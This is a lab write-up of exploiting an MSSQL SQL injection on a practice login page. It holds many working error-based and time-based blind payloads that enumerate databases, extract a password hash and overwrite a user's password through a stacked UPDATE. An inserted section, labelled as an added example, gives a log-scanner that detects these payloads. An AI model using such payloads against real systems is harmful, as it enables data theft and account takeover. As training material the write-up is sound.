SQL Injection


The target web application has a SQL injection vulnerability in the username parameter of the login page. Based on the returned error message, the backend DB appears to be MSSQL. Since this is a login page that returns the SQL error, both error-based and blind SQLi can be performed.

Error-based (Partial)


' OR 1/0 = 1 --
Runtime errors (e.g., CAST, CONVERT) are suppressed by the application's try-catch block. Falling back to the error-based technique listed in the online resource, which only leaks partial data.

' HAVING 1=1 --
The error reveals a column, username, within the users table in the current database.

' GROUP BY users.username HAVING 1=1 --
The error reveals another column, password_hash, within the users table in the current database.

Time-based Blind (Stacked Query)


1'; WAITFOR DELAY '0:0:10'--
The web app hung for about 10 seconds before responding, so stacked queries work against this MSSQL backend.

1' UNION SELECT NULL,NULL--
There appear to be 2 columns. This is rather irrelevant, since we can continue with the stacked query and this is a blind SQLi.

1'; IF EXISTS (SELECT 1 WHERE CURRENT_USER LIKE '%') WAITFOR DELAY '0:0:5'--

1'; IF EXISTS (SELECT 1 WHERE CURRENT_USER LIKE 'butc%') WAITFOR DELAY '0:0:5'--

1'; IF EXISTS (SELECT 1 WHERE CURRENT_USER='butch') WAITFOR DELAY '0:0:5'--
The current user is butch.

1'; IF EXISTS (SELECT 1 WHERE HOST_NAME() LIKE 'b%') WAITFOR DELAY '0:0:5'--

1'; IF EXISTS (SELECT 1 WHERE HOST_NAME()='butch') WAITFOR DELAY '0:0:5'--
The hostname is butch.

1'; IF EXISTS (SELECT 1 WHERE DB_NAME()='butch') WAITFOR DELAY '0:0:5'--
The current DB is also butch.

Database


1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name LIKE '§§%') WAITFOR DELAY '0:0:5'--
Three DBs start with b, m, and t.

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name LIKE 'm§§%') WAITFOR DELAY '0:0:5'--
Three DBs starting with m continue with a, o, and s.

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='butch') WAITFOR DELAY '0:0:5'--
The current butch DB.

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='master') WAITFOR DELAY '0:0:5'--
The master DB.

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='model') WAITFOR DELAY '0:0:5'--
The default model DB.

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='msdb') WAITFOR DELAY '0:0:5'--
The default msdb DB.

1'; IF EXISTS (SELECT 1 FROM master..sysdatabases WHERE name='tempdb') WAITFOR DELAY '0:0:5'--
The default tempdb DB.

Tables


1'; IF EXISTS (SELECT 1 FROM information_schema.tables WHERE table_catalog='butch' AND table_name LIKE '§§%') WAITFOR DELAY '0:0:5'--
There is a table starting with u in the butch DB.

1'; IF EXISTS (SELECT 1 FROM information_schema.tables WHERE table_catalog='butch' AND table_name='users') WAITFOR DELAY '0:0:5'--
Confirmed: butch.users

Columns


1'; IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_catalog='butch' AND table_name='users' AND column_name='username') WAITFOR DELAY '0:0:5'--
Confirmed: butch.users.username

1'; IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_catalog='butch' AND table_name='users' AND column_name LIKE 'password%') WAITFOR DELAY '0:0:5'--
The column name seems to be password, but it cannot be confirmed with the = operator.

Fix


The reason is that the wordlist was missing special characters.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ cat /usr/share/wordlists/_all_ascii_chars.txt | tr -d '\n'  
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

Trying again with the entire ASCII table.

The next character after password is the underscore character: _

The comparison seems to be case-insensitive; the next character is h.

So far: password_ha

1'; IF EXISTS (SELECT 1 FROM information_schema.columns WHERE table_catalog='butch' AND table_name='users' AND column_name='password_hash') WAITFOR DELAY '0:0:5'--
Found a column: butch.users.password_hash

Credential Exfiltration (butch.dbo.users)


1'; IF EXISTS (SELECT 1 FROM butch.dbo.users WHERE username='butch') WAITFOR DELAY '0:0:5'--
Found a user: butch

1'; IF EXISTS (SELECT 1 FROM butch.dbo.users WHERE password_hash LIKE '%') WAITFOR DELAY '0:0:5'--
Brute-forcing the hash character by character.

1'; IF EXISTS (SELECT 1 FROM butch.dbo.users WHERE password_hash='e7b2b06dd8acded117d6d075673274c4ecdc75a788e09e81bffd84f11af6d267') WAITFOR DELAY '0:0:5'--
Found the password hash for the butch user: e7b2b06dd8acded117d6d075673274c4ecdc75a788e09e81bffd84f11af6d267
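Every probe in the enumeration above leaves the same two traces in the web server's logs: a `WAITFOR DELAY` or `HAVING` fragment in a decoded parameter, and (for the time-based ones) a response time that matches the requested delay. The following detection script is an added example, not part of this write-up; the log lines are constructed to mirror the probe styles used here, and the log format (method, path, status, time-taken in ms) is an assumption.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log sample (not a real capture): "METHOD PATH STATUS TIME_TAKEN_MS".
# Lines 2-4 mirror the probe styles seen in this write-up: stacked WAITFOR DELAY,
# error-based HAVING, and a conditional IF EXISTS ... WAITFOR DELAY.
SAMPLE_LOG = """\
POST /login.aspx?username=butch&password=x 200 31
POST /login.aspx?username=1%27%3B+WAITFOR+DELAY+%270%3A0%3A10%27-- 200 10042
POST /login.aspx?username=%27+HAVING+1%3D1+-- 500 22
POST /login.aspx?username=1%27%3B+IF+EXISTS+(SELECT+1+WHERE+CURRENT_USER+LIKE+%27butc%25%27)+WAITFOR+DELAY+%270%3A0%3A5%27-- 200 5019
POST /login.aspx?username=alice&password=y 200 28
"""

# Signatures for the MSSQL techniques used on this page.
SIGNATURES = {
    "time_based": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked_query": re.compile(r"'\s*;\s*(IF|UPDATE|INSERT|DELETE|EXEC|WAITFOR)\b", re.I),
    "error_based": re.compile(r"'\s*(HAVING|GROUP\s+BY)\b", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
}
SLOW_MS = 4000  # the probes on this page delay 5 s or 10 s; anything above this is suspicious

def classify(line):
    """Return a finding dict for one log line, or None when nothing matched."""
    method, path, status, ms = line.split()
    query = unquote_plus(urlsplit(path).query)  # decode once, as the application would
    tags = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if not tags:
        return None
    slow = int(ms) >= SLOW_MS
    # A WAITFOR signature *and* a matching delay means the payload actually executed.
    severity = "high" if slow and "time_based" in tags else "medium"
    return {"path": urlsplit(path).path, "status": int(status),
            "time_ms": int(ms), "tags": tags, "severity": severity}

def scan(log_text):
    """Run classify() over every non-empty line and collect the findings."""
    return [f for f in (classify(l) for l in log_text.splitlines() if l.strip()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['time_ms']:>6} ms  {','.join(f['tags'])}")
```

The latency correlation is what separates a scanner merely sending payloads from a backend that actually ran them; a "high" finding on a login endpoint is worth an immediate look at the query construction behind it.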

Password Cracking


Password hash cracked: awesomedude

Validation

Authentication successful

File Upload

Redirected to the /repo.aspx endpoint, which supports file upload. Moving on to the exploitation phase.

Updating Password of butch (Stacked Query)


This method only works if the type of hash used in the password_hash column is known.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ echo -n 'qwe123' | md5sum   
200820e3227815ed1756a6b531e7e0d2  -
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ echo -n 'qwe123' | sha1sum
c53255317bb11707d0f614696b3ce6f221d0e2f2  -
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ echo -n 'qwe123' | sha256sum
18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63  -

If unknown, it can be "brute-forced" by trying common hashing algorithms and checking which one authenticates.

'; UPDATE users SET password_hash = '18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63' WHERE username = 'butch';--
Using the SHA-256 hash. The web app returned no SQL error, as the stacked query is valid.

I can then authenticate using the updated credential: butch:qwe123